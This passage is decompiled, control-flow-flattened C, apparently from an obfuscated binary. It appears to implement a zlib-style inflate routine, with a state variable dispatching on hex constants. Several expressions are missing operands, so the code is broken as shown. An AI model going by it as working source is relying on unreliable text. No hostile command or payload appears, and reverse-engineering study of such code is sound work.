																						 *(_t2397 + 0x88) =  *(_t2397 + 0x2d0);
																						 *(_t2397 + 0x8c) =  *(_t2397 + 0x2cc);
																						 *(_t2397 + 0x90) =  *(_t2397 + 0x2c8);
																						 *(_t2397 + 0x94) =  *(_t2397 + 0x2c4);
																						 *(_t2397 + 0x98) =  *(_t2397 + 0x2c0);
																						 *(_t2397 + 0x9c) =  *(_t2397 + 0x2bc);
																						if(0x73613943 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					} else {
																						if(_t2310 == 0xc6a82859) {
																							_t2310 = 0xefb4f658;
																							 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x318);
																							 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x314);
																							 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x30c);
																							_t2219 =  *_t2397;
																							_t2219[2] =  &(_t2219[2][ *(_t2397 + 0x310) -  *( *(_t2397 + 0x3a4))]);
																							 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x310);
																							 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2c0);
																							_push( *((intOrPtr*)(_t2397 + 0x31c)));
																							L3:
																							_push(_t2219);
																							_push(_t2392);
																							_t1296 = E00952F00();
																							_t2397 = _t2397 + 0xc;
																							 *((intOrPtr*)(_t2397 + 4)) = _t1296;
																						}
																						goto L4;
																						L466:
																						_t2385 =  *((intOrPtr*)(_t2397 + 0x384));
																						E0096FB8D(_t1898, _t1953,  *(_t2397 + 0x388) ^ _t2397, _t2294, _t2310, _t2385);
																						return _t2385;
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xc79dc334) {
																						_t2310 =  ==  ? 0x8a47630 : 0x22aac5b7;
																						 *(_t2397 + 0x54) =  *(_t2397 + 0x2c0);
																						 *(_t2397 + 0x34) =  *(_t2397 + 0x2bc);
																						if(0x22aac5b7 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																						goto L467;
																					} else {
																						if(_t2310 == 0xc900e488) {
																							_t2310 = 0x88692b27;
																							 *(_t2397 + 0x14c) =  *((intOrPtr*)(_t2397 + 0x270)) -  *(_t2397 + 0x278);
																							if(0x88692b27 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																							goto L467;
																						} else {
																							if(_t2310 != 0xcb3e0bc9) {
																								goto L4;
																							} else {
																								_t2339 = 0xab21c9c6;
																								_t2002 = 0xccf30b47;
																								goto L431;
																							}
																						}
																					}
																				}
																			}
																			goto L297;
																		} else {
																			if(_t2310 > 0xd19278a8) {
																				if(_t2310 <= 0xd6a414a8) {
																					if(_t2310 == 0xd19278a9) {
																						_t2340 = 0x824a9e89;
																						 *(_t2397 + 0x370) =  *(_t2397 + 0x15c);
																						 *((intOrPtr*)(_t2397 + 0x2a4)) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x284))));
																						_t1387 = 0x64909a6e;
																						L451:
																						_t2310 =  ==  ? _t1387 : _t2340;
																						 *(_t2397 + 0x4c) =  *(_t2397 + 0x29c);
																						 *(_t2397 + 0x3c) =  *(_t2397 + 0x370);
																						if(_t2310 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					} else {
																						if(_t2310 != 0xd52f81de) {
																							goto L4;
																						} else {
																							 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x35c);
																							_t1475 = E00952F00(_t2392,  *((intOrPtr*)(_t2397 + 4)),  *((intOrPtr*)(_t2397 + 0x358)));
																							_t2397 = _t2397 + 0xc;
																							 *((intOrPtr*)(_t2397 + 0x264)) = _t1475;
																							_t2316 = 0xf43cee36;
																							 *(_t2397 + 0x268) =  *( *(_t2397 + 0x19c));
																							 *(_t2397 + 0x26c) =  *( *(_t2397 + 0x1a4));
																							_t1341 = 0x772181be;
																							goto L414;
																						}
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xd6a414a9) {
																						_t2310 =  ==  ? 0xd88ab6ea : 0x3449edf6;
																						 *(_t2397 + 0x48) =  *(_t2397 + 0x354);
																						 *(_t2397 + 0x28) =  *(_t2397 + 0x350);
																						if(0x3449edf6 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																						goto L467;
																					} else {
																						if(_t2310 == 0xd88ab6ea) {
																							_t2357 = 0xcd0c46d4;
																							 *((intOrPtr*)(_t2397 + 0x254)) =  *((intOrPtr*)(_t2397 + 0x24));
																							 *((intOrPtr*)(_t2397 + 0x258)) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x254))));
																							_t1446 = 0xc1846e4f;
																							L424:
																							_t2310 =  ==  ? _t1446 : _t2357;
																							 *(_t2397 + 0x40) =  *(_t2397 + 0x354);
																							 *(_t2397 + 0x2c) =  *(_t2397 + 0x350);
																							if(_t2310 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																							goto L467;
																						} else {
																							if(_t2310 != 0xdb2f0603) {
																								goto L4;
																							} else {
																								_t2310 =  <  ? 0xb5c18830 : 0x3745ac89;
																								 *((intOrPtr*)(_t2397 + 0xe8)) =  *((intOrPtr*)(_t2397 + 0x2d4));
																								 *(_t2397 + 0x100) =  *(_t2397 + 0x2d0);
																								 *(_t2397 + 0xf4) =  *(_t2397 + 0x2cc);
																								 *(_t2397 + 0xe0) =  *(_t2397 + 0x2c8);
																								_t1494 =  *(_t2397 + 0x2c4);
																								L283:
																								 *(_t2397 + 0xdc) = _t1494;
																								if(_t2310 <= 0xff0faca1) {
																									continue;
																								} else {
																									goto L5;
																								}
																							}
																						}
																					}
																				}
																				goto L297;
																			} else {
																				if(_t2310 <= 0xce0115b7) {
																					if(_t2310 == 0xccf30b47) {
																						_t2339 = 0xd15493e1;
																						_t2002 = 0xc663d9a7;
																						goto L431;
																					} else {
																						if(_t2310 != 0xcd0c46d4) {
																							goto L4;
																						} else {
																							_t2003 =  *(_t2397 + 0x2c);
																							 *(_t2397 + 0x35c) =  *(_t2397 + 0x40);
																							_t2310 =  ==  ? 0xd52f81de : 0x3449edf6;
																							_t1498 =  *(_t2397 + 0x35c);
																							L321:
																							 *(_t2397 + 0x48) = _t1498;
																							 *(_t2397 + 0x28) = _t2003;
																							if(_t2310 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																						}
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xce0115b8) {
																						 *(_t2397 + 0x2d8) =  *(_t2397 + 0xf0);
																						_t2310 =  ==  ? 0x930c257d : 0xe8203db1;
																						 *((intOrPtr*)(_t2397 + 0xd4)) =  *((intOrPtr*)(_t2397 + 0x1b4));
																						 *(_t2397 + 0xd0) =  *(_t2397 + 0x1b8);
																						 *(_t2397 + 0xcc) =  *(_t2397 + 0x1bc);
																						 *(_t2397 + 0xc8) =  *(_t2397 + 0x1c0);
																						 *(_t2397 + 0xc4) =  *(_t2397 + 0x1c4);
																						 *(_t2397 + 0xc0) =  *(_t2397 + 0x1c8);
																						_t1333 =  *(_t2397 + 0x2d8);
																						L377:
																						 *(_t2397 + 0xbc) = _t1333;
																						if(_t2310 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																						goto L467;
																					} else {
																						if(_t2310 == 0xce858734) {
																							_t2316 = 0x22599e28;
																							_t1341 = 0xc2f6eac7;
																							L414:
																							_t2310 =  <  ? _t1341 : _t2316;
																							if(_t2310 <= 0xff0faca1) {
																								continue;
																							} else {
																								goto L5;
																							}
																							goto L467;
																						} else {
																							if(_t2310 != 0xd15493e1) {
																								goto L4;
																							} else {
																								_t2339 = 0xdb2f0603;
																								_t2002 = 0x8427f6b5;
																								L431:
																								_t2310 =  <  ? _t2002 : _t2339;
																								if(_t2310 <= 0xff0faca1) {
																									continue;
																								} else {
																									goto L5;
																								}
																								L467:
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	L231:
																	if(_t2310 > 0xb0d3e7d3) {
																		if(_t2310 > 0xb73727e9) {
																			if(_t2310 <= 0xb9c2efff) {
																				if(_t2310 == 0xb73727ea) {
																					_t1953 =  !=  ? 0x64bbdec4 : 0xffa08ee3;
																					_t1898 =  *(_t2397 + 0x23c);
																					_t2294 =  *(_t2397 + 0x328);
																					_t2349 =  ==  ? 0x64bbdec4 : 0xffa08ee3;
																					_t2310 =  >=  ? 0xffa08ee3 :  ==  ? 0x64bbdec4 : 0xffa08ee3;
																					 *((char*)(_t2397 + 0x243)) =  *(_t2397 + 0x328) -  *(_t2397 + 0x23c) > 0;
																					if(0xffa08ee3 <= 0xff0faca1) {
																						continue;
																					} else {
																						goto L5;
																					}
																				} else {
																					if(_t2310 != 0xb8081998) {
																						goto L4;
																					} else {
																						_t2310 =  !=  ? 0x4e2f5837 : 0x7d542e43;
																						L356:
																						 *(_t2397 + 0x50) =  *(_t2397 + 0x2c0);
																						 *(_t2397 + 0x38) =  *(_t2397 + 0x2bc);
																						if(_t2310 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					}
																				}
																				goto L467;
																			} else {
																				if(_t2310 == 0xb9c2f000) {
																					_t2310 = 0xbaa2216b;
																					 *(_t2397 + 0x170) =  *(_t2397 + 0x2cc) + 0xfffffff8;
																					 *(_t2397 + 0x160) =  &(( *(_t2397 + 0x2c4))[1]);
																					_t1898 =  *(_t2397 + 0x2c8) - 1;
																					 *(_t2397 + 0x158) =  *(_t2397 + 0x2c8) - 1;
																					if(0xbaa2216b <= 0xff0faca1) {
																						continue;
																					} else {
																						goto L5;
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xbaa2216b) {
																						 *(_t2397 + 0x378) =  *(_t2397 + 0x160);
																						 *(_t2397 + 0x37c) =  *(_t2397 + 0x158);
																						 *(_t2397 + 0x380) =  *(_t2397 + 0x170);
																						 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2c0);
																						_t1932 = E00952F00(_t2392,  *((intOrPtr*)(_t2397 + 4)),  *((intOrPtr*)(_t2397 + 0x2d4)));
																						_t2397 = _t2397 + 0xc;
																						 *((intOrPtr*)(_t2397 + 0x2b0)) = _t1932;
																						_t2316 = 0x5f90ff14;
																						 *(_t2397 + 0x2b4) =  *( *(_t2397 + 0x19c));
																						 *(_t2397 + 0x2b8) =  *( *(_t2397 + 0x1a4));
																						_t1341 = 0xbc6603fc;
																						goto L414;
																					} else {
																						if(_t2310 != 0xbc6603fc) {
																							goto L4;
																						} else {
																							goto L290;
																						}
																					}
																				}
																			}
																		} else {
																			if(_t2310 <= 0xb2c900df) {
																				if(_t2310 == 0xb0d3e7d4) {
																					_t1898 =  *(_t2397 + 0x2ac);
																					_t2310 = 0x824a9e89;
																					 *(_t2397 + 0x4c) =  *(_t2397 + 0x2ac);
																					 *(_t2397 + 0x3c) =  *(_t2397 + 0x168);
																					if(0x824a9e89 <= 0xff0faca1) {
																						continue;
																					} else {
																						goto L5;
																					}
																				} else {
																					if(_t2310 != 0xb1443178) {
																						goto L4;
																					} else {
																						 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x2d0);
																						 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x380);
																						 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x378);
																						_t2228 =  *_t2397;
																						 *((intOrPtr*)(_t2228 + 8)) =  *((intOrPtr*)(_t2228 + 8)) +  *(_t2397 + 0x37c) -  *( *(_t2397 + 0x3a4));
																						 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x37c);
																						 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2b4);
																						_push( *((intOrPtr*)(_t2397 + 0x2b0)));
																						goto L419;
																					}
																				}
																				goto L467;
																			} else {
																				if(_t2310 == 0xb2c900e0) {
																					_t2312 = 0x65a24411;
																					_t1535 = 0x6b222ac4;
																					goto L381;
																				} else {
																					if(_t2310 == 0xb5c18830) {
																						_t2310 = 0xdcf1a834;
																						 *(_t2397 + 0x20c) =  *(_t2397 + 0x17c) + 8;
																						 *(_t2397 + 0x210) =  *(_t2397 + 0x20c);
																						 *(_t2397 + 0x214) =  &(( *(_t2397 + 0x210))[1]);
																						 *(_t2397 + 0xb8) =  *(_t2397 + 0xdc);
																						_t1898 =  *( *(_t2397 + 0x214));
																						 *(_t2397 + 0xb4) =  *(_t2397 + 0xe0);
																						_t2294 =  *(_t2397 + 0x100);
																						 *(_t2397 + 0xac) =  *(_t2397 + 0xf4);
																						 *(_t2397 + 0x218) =  *( *(_t2397 + 0x214));
																						 *(_t2397 + 0xb0) =  *(_t2397 + 0x100);
																						 *((intOrPtr*)(_t2397 + 0xa4)) =  *((intOrPtr*)(_t2397 + 0xe8));
																						if(0xdcf1a834 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																						goto L467;
																					} else {
																						if(_t2310 != 0xb6a88063) {
																							goto L4;
																						} else {
																							_t2312 = 0xb1443178;
																							_t1535 = 0x7a5b4e39;
																							goto L381;
																						}
																					}
																				}
																			}
																		}
																		goto L297;
																	}
																	if(_t2310 > 0xa7895ae5) {
																		if(_t2310 <= 0xab21c9c5) {
																			if(_t2310 == 0xa7895ae6) {
																				_t1898 =  *(_t2397 + 0x25c);
																				_t2297 =  *(_t2397 + 0x260);
																				_t2310 = 0x112d89bb;
																				_t2294 = ((_t2297 & 0x61e1bbda |  !_t2297 & 0x9e1e4425) ^ 0x61e1bbda) +  *(_t2397 + 0x25c);
																				 *(_t2397 + 0x144) = ((_t2297 & 0x61e1bbda |  !_t2297 & 0x9e1e4425) ^ 0x61e1bbda) +  *(_t2397 + 0x25c);
																				if(0x112d89bb <= 0xff0faca1) {
																					continue;
																				} else {
																					goto L5;
																				}
																			} else {
																				if(_t2310 != 0xaa51a59f) {
																					goto L4;
																				} else {
																					_t1898 =  *(_t2397 + 0x1cc);
																					_t2310 = 0xce0115b8;
																					 *(_t2397 + 0xf0) =  !( *(_t2397 + 0x1c8)) +  *(_t2397 + 0x1cc);
																					if(0xce0115b8 <= 0xff0faca1) {
																						continue;
																					} else {
																						goto L5;
																					}
																				}
																			}
																			goto L467;
																		} else {
																			if(_t2310 == 0xab21c9c6) {
																				_t1898 =  *(_t2397 + 0x1b0);
																				_t2339 = 0x62b1c5ad;
																				_t2002 = 0xc3f77703;
																				goto L431;
																			} else {
																				if(_t2310 == 0xac68a44e) {
																					_t1898 =  *(_t2397 + 0x290);
																					_t2301 =  *(_t2397 + 0x294);
																					_t2310 = 0x70443c83;
																					_t2294 = ((_t2301 & 0xa7b647dc |  !_t2301 & 0x5849b823) ^ 0xa7b647dc) +  *(_t2397 + 0x290);
																					 *(_t2397 + 0x154) = ((_t2301 & 0xa7b647dc |  !_t2301 & 0x5849b823) ^ 0xa7b647dc) +  *(_t2397 + 0x290);
																					if(0x70443c83 <= 0xff0faca1) {
																						continue;
																					} else {
																						goto L5;
																					}
																					goto L467;
																				} else {
																					if(_t2310 != 0xaea34227) {
																						goto L4;
																					} else {
																						 *(_t2397 + 0xa8) =  *(_t2397 + 0x2e4) - 1;
																						 *(_t2397 + 0xa0) =  &(( *(_t2397 + 0x2e8))[1]);
																						_t1975 =  *(_t2397 + 0x2f0);
																						_t1914 = ( *( *(_t2397 + 0x2e8)) & 0x000000ff) <<  *(_t2397 + 0x2ec);
																						_t2387 =  !_t1975;
																						_t2306 =  !_t1914;
																						_t2294 = _t2306 & 0xeb5e22a6;
																						_t1953 = _t1975 & 0x14a1dd59 | _t2387 & 0xeb5e22a6;
																						_t2310 = 0x62a18ca4;
																						 *(_t2397 + 0x80) =  !(_t2387 | _t2306) | (_t1914 & 0x14a1dd59 | _t2306 & 0xeb5e22a6) ^ (_t1975 & 0x14a1dd59 | _t2387 & 0xeb5e22a6);
																						 *((intOrPtr*)(_t2397 + 0x64)) = 0;
																						_t1898 =  *(_t2397 + 0x2ec) + 8;
																						 *(_t2397 + 0x68) =  *(_t2397 + 0x2ec) + 8;
																						if(0x62a18ca4 <= 0xff0faca1) {
																							continue;
																						} else {
																							goto L5;
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L297;
																}
																if(_t2310 <= 0xa6e079b5) {
																	if(_t2310 > 0x972443c7) {
																		if(_t2310 <= 0x9c2ce5c2) {
																			if(_t2310 > 0x9a116708) {
																				if(_t2310 == 0x9a116709) {
																					_t2311 = 0xab3bcb1;
																					_t1983 = 0xac68a44e;
																					goto L464;
																				} else {
																					if(_t2310 != 0x9a85978c) {
																						goto L4;
																					} else {
																						_t2371 = 0xa6e079b6;
																						_t1405 = 0xef81ea3c;
																						L374:
																						_t1406 =  !=  ? _t2371 : _t1405;
																						_t2321 =  ==  ? _t2371 : _t1406;
																						_t2310 =  >=  ? _t1406 :  ==  ? _t2371 : _t1406;
																						if(_t2310 <= 0xff0faca1) {
																							goto L221;
																						} else {
																							continue;
																						}
																					}
																				}
																			} else {
																				if(_t2310 == 0x972443c8) {
																					_t2310 = 0x7d154f5a;
																					 *(_t2397 + 0x130) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x24)))) -  *(_t2397 + 0x248) +  *(_t2397 + 0x348);
																					if(0x7d154f5a <= 0xff0faca1) {
																						goto L221;
																					} else {
																						continue;
																					}
																				} else {
																					if(_t2310 != 0x9810a81a) {
																						goto L4;
																					} else {
																						 *( *(_t2397 + 0x1ac)) = 7;
																						goto L403;
																					}
																				}
																			}
																			goto L467;
																		} else {
																			if(_t2310 <= 0xa23d06a8) {
																				if(_t2310 == 0x9c2ce5c3) {
																					_t2310 = 0xcb3e0bc9;
																					 *(_t2397 + 0x2bc) =  *(_t2397 + 0x60);
																					 *(_t2397 + 0x2c0) =  *(_t2397 + 0x78);
																					 *(_t2397 + 0x2c4) =  *(_t2397 + 0x7c);
																					 *(_t2397 + 0x2c8) =  *(_t2397 + 0x74);
																					 *(_t2397 + 0x2cc) =  *(_t2397 + 0x70);
																					 *(_t2397 + 0x2d0) =  *(_t2397 + 0x6c);
																					 *((intOrPtr*)(_t2397 + 0x2d4)) =  *((intOrPtr*)(_t2397 + 0x5c));
																					 *(_t2397 + 0x1ac) =  *(_t2397 + 0x17c);
																					 *(_t2397 + 0x1b0) =  *( *(_t2397 + 0x1ac));
																					if(0xcb3e0bc9 <= 0xff0faca1) {
																						goto L221;
																					} else {
																						continue;
																					}
																				} else {
																					if(_t2310 != 0x9f623e6c) {
																						goto L4;
																					} else {
																						_t2310 = 0x9159e3be;
																						 *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x250)))) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x250)))) - 1;
																						if(0x9159e3be <= 0xff0faca1) {
																							goto L221;
																						} else {
																							continue;
																						}
																					}
																				}
																				goto L467;
																			} else {
																				if(_t2310 == 0xa23d06a9) {
																					_t2310 = 0xa592e520;
																					 *(_t2397 + 0x114) =  *(_t2397 + 0x1fc);
																					 *(_t2397 + 0x110) =  *(_t2397 + 0x200);
																					 *((intOrPtr*)(_t2397 + 0xfc)) = 0;
																					 *(_t2397 + 0x108) =  *(_t2397 + 0x204);
																					 *(_t2397 + 0xf8) =  *(_t2397 + 0x208);
																					if(0xa592e520 <= 0xff0faca1) {
																						goto L221;
																					} else {
																						continue;
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0xa3ef3801) {
																						_t1953 =  !=  ? 0x868bf3ce : 0xf68b329c;
																						_t2344 =  ==  ? 0x868bf3ce : 0xf68b329c;
																						_t2310 =  >=  ? 0xf68b329c :  ==  ? 0x868bf3ce : 0xf68b329c;
																						 *((char*)(_t2397 + 0x21f)) =  *(_t2397 + 0x30c) != 0;
																						if(0xf68b329c <= 0xff0faca1) {
																							goto L221;
																						} else {
																							continue;
																						}
																						goto L467;
																					} else {
																						if(_t2310 != 0xa592e520) {
																							goto L4;
																						} else {
																							_t2311 = 0x346ee7dc;
																							 *(_t2397 + 0x2f8) =  *(_t2397 + 0x114);
																							 *(_t2397 + 0x2fc) =  *(_t2397 + 0x110);
																							 *(_t2397 + 0x300) =  *(_t2397 + 0xf8);
																							 *(_t2397 + 0x304) =  *(_t2397 + 0x108);
																							 *((intOrPtr*)(_t2397 + 0x308)) =  *((intOrPtr*)(_t2397 + 0xfc));
																							_t1983 = 0xff3f4d8e;
																							goto L464;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		if(_t2310 <= 0x868bf3cd) {
																			if(_t2310 > 0x8427f6b4) {
																				if(_t2310 == 0x8427f6b5) {
																					_t2310 = 0xa592e520;
																					 *(_t2397 + 0x1f4) =  *(_t2397 + 0x17c) + 8;
																					 *(_t2397 + 0x1f8) =  *( *(_t2397 + 0x1f4));
																					 *((intOrPtr*)(_t2397 + 0xfc)) =  *((intOrPtr*)(_t2397 + 0x2d4));
																					 *(_t2397 + 0x108) =  *(_t2397 + 0x2d0);
																					 *(_t2397 + 0xf8) =  *(_t2397 + 0x2cc);
																					 *(_t2397 + 0x110) =  *(_t2397 + 0x2c8);
																					 *(_t2397 + 0x114) =  *(_t2397 + 0x2c4);
																					if(0xa592e520 <= 0xff0faca1) {
																						goto L221;
																					} else {
																						continue;
																					}
																				} else {
																					if(_t2310 != 0x85d6fbbf) {
																						goto L4;
																					} else {
																						_t2334 = 0x3e39d2a6;
																						_t1510 = 0xe96fd8b3;
																						goto L440;
																					}
																				}
																			} else {
																				if(_t2310 == 0x80894ce4) {
																					_t2310 = 0x9c2ce5c3;
																					 *(_t2397 + 0x78) =  *(_t2397 + 0x10);
																					 *(_t2397 + 0x7c) =  *(_t2397 + 0xc);
																					 *(_t2397 + 0x60) =  *(_t2397 + 8);
																					 *(_t2397 + 0x74) =  *(_t2397 + 0x14);
																					 *(_t2397 + 0x70) =  *(_t2397 + 0x1c);
																					_t2294 =  *(_t2397 + 0x20);
																					 *(_t2397 + 0x6c) =  *(_t2397 + 0x20);
																					 *((intOrPtr*)(_t2397 + 0x5c)) =  *(_t2397 + 0x18);
																					if(0x9c2ce5c3 <= 0xff0faca1) {
																						goto L221;
																					} else {
																						continue;
																					}
																				} else {
																					if(_t2310 != 0x824a9e89) {
																						goto L4;
																					} else {
																						_t2078 =  *(_t2397 + 0x3c);
																						 *(_t2397 + 0x374) =  *(_t2397 + 0x4c);
																						_t2310 =  ==  ? 0x65883e44 : 0x22aac5b7;
																						_t1550 =  *(_t2397 + 0x374);
																						L303:
																						 *(_t2397 + 0x54) = _t1550;
																						 *(_t2397 + 0x34) = _t2078;
																						if(_t2310 <= 0xff0faca1) {
																							goto L221;
																						} else {
																							continue;
																						}
																					}
																				}
																			}
																			goto L467;
																		} else {
																			if(_t2310 <= 0x88692b26) {
																				if(_t2310 == 0x868bf3ce) {
																					_t2334 = 0xc6a82859;
																					_t1510 = 0x4ac5dc86;
																					L440:
																					_t2310 =  !=  ? _t1510 : _t2334;
																					if(_t2310 <= 0xff0faca1) {
																						goto L221;
																					} else {
																						continue;
																					}
																				} else {
																					if(_t2310 != 0x871eb044) {
																						goto L4;
																					} else {
																						_t2310 = 0x977d26a;
																						 *( *(_t2397 + 0x1d0)) =  *(_t2397 + 0x1f0) & 0x0000000f;
																						 *( *(_t2397 + 0x17c) + 4) = ( *(_t2397 + 0x1e4))[4];
																						 *( *(_t2397 + 0x1ac)) = 2;
																						if(0x977d26a <= 0xff0faca1) {
																							goto L221;
																						} else {
																							continue;
																						}
																					}
																				}
																				goto L467;
																			} else {
																				if(_t2310 == 0x88692b27) {
																					_t1898 =  *(_t2397 + 0x278);
																					_t2310 = 0xfb56c3f7;
																					 *(_t2397 + 0x44) =  *(_t2397 + 0x278);
																					 *(_t2397 + 0x30) =  *(_t2397 + 0x14c);
																					if(0xfb56c3f7 <= 0xff0faca1) {
																						goto L221;
																					} else {
																						continue;
																					}
																					goto L467;
																				} else {
																					if(_t2310 == 0x9159e3be) {
																						_t2317 = 0x9f623e6c;
																						_t2262 = 0x32ad2375;
																						_t2374 = 0x9f623e6c;
																						 *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x250)))) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x250)))) - 1;
																						goto L391;
																					} else {
																						if(_t2310 != 0x930c257d) {
																							goto L4;
																						} else {
																							_t2310 = 0x73613943;
																							_t2188 =  *(_t2397 + 0x17c);
																							 *(_t2188 + 0xc) =  *( *(_t2397 + 0x17c) + 0x10) & 0x000000ff;
																							 *((intOrPtr*)(_t2188 + 8)) =  *((intOrPtr*)( *(_t2397 + 0x17c) + 0x14));
																							_t1898 =  *(_t2397 + 0x1ac);
																							 *(_t2397 + 0x9c) =  *(_t2397 + 0xbc);
																							 *(_t2397 + 0x98) =  *(_t2397 + 0xc0);
																							 *( *(_t2397 + 0x1ac)) = 1;
																							 *(_t2397 + 0x94) =  *(_t2397 + 0xcc);
																							 *(_t2397 + 0x90) =  *(_t2397 + 0xd0);
																							_t2294 =  *(_t2397 + 0xc8);
																							 *(_t2397 + 0x8c) =  *(_t2397 + 0xc4);
																							 *(_t2397 + 0x88) =  *(_t2397 + 0xc8);
																							 *((intOrPtr*)(_t2397 + 0x84)) =  *((intOrPtr*)(_t2397 + 0xd4));
																							if(0x73613943 <= 0xff0faca1) {
																								goto L221;
																							} else {
																								continue;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L297;
																}
																goto L231;
															} else {
																continue;
															}
															L297:
															if(_t2310 != 0xa6e079b6) {
																goto L4;
															}
															goto L466;
														}
													}
												}
											}
										}
									}
								}
								goto L221;
							}
							if(_t2310 <= 0x22aac5b6) {
								if(_t2310 > 0x112d89ba) {
									if(_t2310 <= 0x15d350fc) {
										if(_t2310 > 0x13b55bda) {
											if(_t2310 == 0x13b55bdb) {
												_t2219 =  *_t2397;
												_t2310 = 0xefb4f658;
												 *( *(_t2397 + 0x1ac)) = 9;
												_t2219[6] = "invalid distance code";
												 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x228);
												 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x22c);
												 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x30c);
												_t2219[2] =  &(_t2219[2][ *(_t2397 + 0x310) -  *( *(_t2397 + 0x3a4))]);
												 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x310);
												_t1295 =  *(_t2397 + 0x19c);
												_t1995 =  *(_t2397 + 0x2c0);
												goto L220;
											} else {
												if(_t2310 != 0x151a4090) {
													goto L4;
												} else {
													_t2310 = 0xce0115b8;
													 *(_t2397 + 0xf0) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x24)))) -  *(_t2397 + 0x1c8);
													if(0xce0115b8 > 0xff0faca1) {
														continue;
													}
												}
											}
										} else {
											if(_t2310 == 0x112d89bb) {
												_t2310 = 0xcd0c46d4;
												 *(_t2397 + 0x40) =  *(_t2397 + 0x260);
												 *(_t2397 + 0x2c) =  *(_t2397 + 0x144);
												if(0xcd0c46d4 > 0xff0faca1) {
													continue;
												}
											} else {
												if(_t2310 != 0x12555164) {
													goto L4;
												} else {
													_t2312 = 0x576e88dc;
													_t1535 = 0x58c502aa;
													goto L381;
												}
											}
										}
									} else {
										if(_t2310 <= 0x19984b7a) {
											if(_t2310 == 0x15d350fd) {
												_t2310 =  <  ? 0xfa4e60ee : 0xe4f9ab1b;
												 *(_t2397 + 0x174) =  *(_t2397 + 0x2cc);
												 *(_t2397 + 0x16c) =  *(_t2397 + 0x2c8);
												 *(_t2397 + 0x164) =  *(_t2397 + 0x2c4);
												 *(_t2397 + 0x178) =  *(_t2397 + 0x2c0);
												if(0xe4f9ab1b > 0xff0faca1) {
													continue;
												}
											} else {
												if(_t2310 != 0x17792f21) {
													goto L4;
												} else {
													 *( *(_t2397 + 0x18c)) =  *(_t2397 + 0x2d0);
													 *( *(_t2397 + 0x194)) =  *(_t2397 + 0x2cc);
													 *( *(_t2397 + 0x184)) =  *(_t2397 + 0x2c4);
													( *_t2397)[2] =  &(( *_t2397)[2][ *(_t2397 + 0x2c8) -  *( *(_t2397 + 0x3a4))]);
													 *( *(_t2397 + 0x3a4)) =  *(_t2397 + 0x2c8);
													 *( *(_t2397 + 0x19c)) =  *(_t2397 + 0x2c0);
													_t1586 = E009571E0( *( *(_t2397 + 0x17c) + 0x10) & 0x000000ff,  *( *(_t2397 + 0x17c) + 0x11) & 0x000000ff,  *((intOrPtr*)( *(_t2397 + 0x17c) + 0x14)),  *( *(_t2397 + 0x17c) + 0x18), _t2392,  *_t2397);
													_t2397 = _t2397 + 0x18;
													 *((intOrPtr*)(_t2397 + 0x1b4)) = _t1586;
													_t2316 = 0x151a4090;
													 *(_t2397 + 0x1b8) =  *( *(_t2397 + 0x3a4));
													 *(_t2397 + 0x1bc) =  *( *(_t2397 + 0x184));
													 *(_t2397 + 0x1c0) =  *( *(_t2397 + 0x18c));
													 *(_t2397 + 0x1c4) =  *( *(_t2397 + 0x194));
													 *(_t2397 + 0x1c8) =  *( *(_t2397 + 0x19c));
													 *(_t2397 + 0x1cc) =  *( *(_t2397 + 0x1a4));
													_t1341 = 0xaa51a59f;
													goto L414;
												}
											}
										} else {
											if(_t2310 == 0x19984b7b) {
												_t2310 = 0xe6a0b78c;
												if(0xe6a0b78c > 0xff0faca1) {
													continue;
												}
											} else {
												if(_t2310 == 0x21528732) {
													goto L403;
												} else {
													if(_t2310 != 0x22599e28) {
														goto L4;
													} else {
														_t2310 = 0x682275b2;
														 *(_t2397 + 0xec) =  *((intOrPtr*)( *((intOrPtr*)(_t2397 + 0x24)))) -  *(_t2397 + 0x1a0);
														if(0x682275b2 > 0xff0faca1) {
															continue;
														}
													}
												}
											}
										}
									}
								} else {
									if(_t2310 <= 0x977d269) {
										if(_t2310 > 0xffa08ee2) {
											if(_t2310 == 0xffa08ee3) {
												_t2310 = 0xb73727ea;
												if(0xb73727ea > 0xff0faca1) {
													continue;
												}
											} else {
